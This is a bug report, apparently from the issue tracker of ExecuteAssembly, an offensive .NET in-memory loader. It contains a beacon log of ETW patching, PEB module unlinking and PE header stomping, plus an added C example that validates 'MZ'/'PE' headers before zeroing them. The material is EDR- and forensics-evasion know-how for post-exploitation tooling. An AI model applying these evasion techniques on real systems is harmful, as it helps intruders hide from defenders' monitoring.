Load/Inject .NET assemblies by reusing the CLR AppDomainManager already loaded in the host (spawnto) process, stomping the loader's and the .NET assembly's PE DOS headers, unlinking .NET-related modules from the PEB, bypassing ETW and AMSI, avoiding EDR hooks via static NT syscalls (x64), and hiding imports by resolving APIs dynamically (by hash).
Hi,

I'm seeing failures when using the "--stomp-headers" argument. I'm using the following command line:
ExecuteAssembly --dotnetassembly /tmp/Seatbelt.exe --unlink-modules --etw --asmi --stomp-headers
Which results in something like this:
* Tasked beacon to run: @args
* Tasked beacon to spawn x86 features to: %windir%\SysWOW64\ScriptRunner.exe
* Tasked beacon to spawn x64 features to: %windir%\sysnative\ScriptRunner.exe
* Tasked beacon to spawn .NET Assembly /tmp/Seatbelt.exe'
[+] host called home, sent: 85 bytes
[+] host called home, sent: 480116 bytes
[+] received output:
[i]: .NET Assembly Length: 548352 bytes
[+]: Parsing Arguments :
[i]: Args count: 1
[+]: Base64 Decoding & Decompressing .NET Assembly...
[+]: Base64 Decoding & Decompressing Done.
[+]: Patching ETW...
[+]: Retrieving EtwEvenWrite Address from NTDLL...
[+]: NTDLL.DLL Module Base Address: 0xfeea0000
[+]: EtwEvenWrite Export located at Address: 0xfeef2d50
[+]: Patching EtwEvenWrite 0xfeef2d50
[+]: ETW Patchine Done.
[+]: Enumerating Loaded CLR versions
[+]: Scanning for any loaded modules with the name 'clr', 'mscoree'...
[+] Unlinking CLR related modules from PEB
[i]: Module C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll
[i]: Module C:\WINDOWS\SYSTEM32\ucrtbase_clr0400.dll
[i]: Module C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll
[i]: Module C:\WINDOWS\SYSTEM32\ucrtbase_clr0400.dll
[i]: Module C:\WINDOWS\SYSTEM32\ucrtbase_clr0400.dll
[i]: Module C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll
[i]: Module C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll
[i]: Module C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll
[i]: Module C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll
[+]: Obtaining a handle of the current process: 820
[+]: Scanning for PE DOS Header 'MZ...' pattern...
[i]: 9 PE DOS Headers found.
[+]: Stomping 9 PE DOS headers:
[i]: Stomping MZ Header: 0xbfefeb80
[-]: Not a valid PE DOS Header
[i]: Stomping MZ Header: 0x10009ac0
[i]: Stomping MZ Header: 0x6a7a0009
[i]: Stomping MZ Header: 0x6a7c2ed9
[i]: Stomping MZ Header: 0x6a9e0000
[i]: Stomping MZ Header: 0x6aa03cd0
[i]: Stomping MZ Header: 0x6c50ccb0
[i]: Stomping MZ Header: 0x6c600000
[i]: Stomping MZ Header: 0x6cfd0080
[!] pMethodInfo->Invoke_3(...) failed, hr = 80131604
[!]: Something went wrong.
If I leave out --stomp-headers it all works flawlessly.
EDIT: If I switch to the PEB walking method, header stomping works fine.
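The log above is a useful illustration of why a raw "MZ" byte-pattern scan is a risky way to locate headers to stomp: several of the reported hits (0x6a7a0009, 0x6a7c2ed9, 0x6aa03cd0, 0x6c50ccb0, 0x6cfd0080) are not page-aligned, so they are almost certainly "MZ" bytes inside data or code rather than the DOS header of a mapped image, and zeroing them corrupts whatever lives there. Invoke_3 then fails with HRESULT 0x80131604 (COR_E_TARGETINVOCATION, the CLR's wrapper for an exception thrown inside the invoked method), which is consistent with the assembly or runtime having been damaged. Walking the PEB module list yields real image bases instead, which is why that mode works. The following is an added example, not code from ExecuteAssembly or from the reporter: it contrasts a naive pattern scan with a scan that validates the full DOS header and the "PE\0\0" signature at e_lfanew before stomping, run over a constructed in-memory image (the buffer layout, sizes and the helper names are assumptions made for the example, not the project's structures).

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define DOS_MAGIC       0x5A4Du      /* "MZ" read as little-endian uint16 */
#define NT_SIGNATURE    0x00004550u  /* "PE\0\0" read as little-endian uint32 */
#define E_LFANEW_OFFSET 0x3C         /* IMAGE_DOS_HEADER.e_lfanew */
#define DOS_HEADER_SIZE 0x40         /* sizeof(IMAGE_DOS_HEADER) */
#define STOMP_BYTES     DOS_HEADER_SIZE  /* zero the DOS header: what "MZ" scanners key on */

static uint16_t rd16(const uint8_t *p) { uint16_t v; memcpy(&v, p, 2); return v; }
static uint32_t rd32(const uint8_t *p) { uint32_t v; memcpy(&v, p, 4); return v; }

/* Full check: the DOS header fits in the buffer, the magic is "MZ", and e_lfanew
   points past the DOS header, inside the buffer, at a "PE\0\0" signature.
   A bare two-byte "MZ" match inside data fails the e_lfanew/signature checks. */
int is_valid_pe_header(const uint8_t *buf, size_t len, size_t off)
{
    if (off > len || len - off < DOS_HEADER_SIZE) return 0;
    if (rd16(buf + off) != DOS_MAGIC) return 0;
    uint32_t e_lfanew = rd32(buf + off + E_LFANEW_OFFSET);
    if (e_lfanew < DOS_HEADER_SIZE) return 0;
    if (e_lfanew > len - off || (len - off) - e_lfanew < 4) return 0;
    return rd32(buf + off + e_lfanew) == NT_SIGNATURE;
}

/* Collect candidate header offsets. validate=0 reproduces a raw "MZ" pattern scan;
   validate=1 keeps only offsets that pass is_valid_pe_header(). Returns the hit count
   (may exceed max_hits; only the first max_hits offsets are stored). */
size_t find_headers(const uint8_t *buf, size_t len, int validate, size_t *hits, size_t max_hits)
{
    size_t n = 0;
    for (size_t off = 0; off + 1 < len; off++) {
        if (buf[off] != 'M' || buf[off + 1] != 'Z') continue;
        if (validate && !is_valid_pe_header(buf, len, off)) continue;
        if (n < max_hits) hits[n] = off;
        n++;
    }
    return n;
}

/* Zero STOMP_BYTES at every hit (clamped to the buffer end). Returns stomps performed. */
size_t stomp_headers(uint8_t *buf, size_t len, int validate)
{
    size_t hits[64];
    size_t n = find_headers(buf, len, validate, hits, 64);
    if (n > 64) n = 64;
    for (size_t i = 0; i < n; i++) {
        size_t span = STOMP_BYTES;
        if (len - hits[i] < span) span = len - hits[i];
        memset(buf + hits[i], 0, span);
    }
    return n;
}

#define IMG_SIZE 0x400
#define DATA_OFF 0x200
#define DATA_STR "payload: MZ in data"   /* constructed data; "MZ" lands at 0x209 */

/* Constructed sample image (not a real module): a DOS header with e_lfanew = 0x80,
   "PE\0\0" at 0x80, a data region containing a stray "MZ", and a truncated "MZ"
   in the last two bytes where no header could possibly fit. */
void build_sample_image(uint8_t *img)
{
    memset(img, 0, IMG_SIZE);
    img[0] = 'M'; img[1] = 'Z';
    uint32_t e_lfanew = 0x80;
    memcpy(img + E_LFANEW_OFFSET, &e_lfanew, 4);
    memcpy(img + 0x80, "PE\0\0", 4);
    memcpy(img + DATA_OFF, DATA_STR, sizeof(DATA_STR) - 1);
    img[IMG_SIZE - 2] = 'M'; img[IMG_SIZE - 1] = 'Z';
}

int main(void)
{
    uint8_t img[IMG_SIZE];
    size_t hits[8];

    build_sample_image(img);
    printf("raw 'MZ' scan hits:   %zu\n", find_headers(img, IMG_SIZE, 0, hits, 8));
    printf("validated scan hits:  %zu\n", find_headers(img, IMG_SIZE, 1, hits, 8));

    build_sample_image(img);
    stomp_headers(img, IMG_SIZE, 0);
    printf("data intact after raw stomp:       %s\n",
           memcmp(img + DATA_OFF, DATA_STR, sizeof(DATA_STR) - 1) == 0 ? "yes" : "no");

    build_sample_image(img);
    stomp_headers(img, IMG_SIZE, 1);
    printf("data intact after validated stomp: %s\n",
           memcmp(img + DATA_OFF, DATA_STR, sizeof(DATA_STR) - 1) == 0 ? "yes" : "no");
    return 0;
}
```

The raw scan reports three "headers" in the sample (the real one, the stray "MZ" in the data region, and the truncated pair at the end) and zeroing all of them destroys the data region; the validated scan reports only the real header. In a live process the same validation should be applied to each candidate whether it comes from a memory scan or from the PEB's module list, and the PEB walk is preferable anyway because it hands back image bases directly instead of every "MZ" the scanner happens to touch.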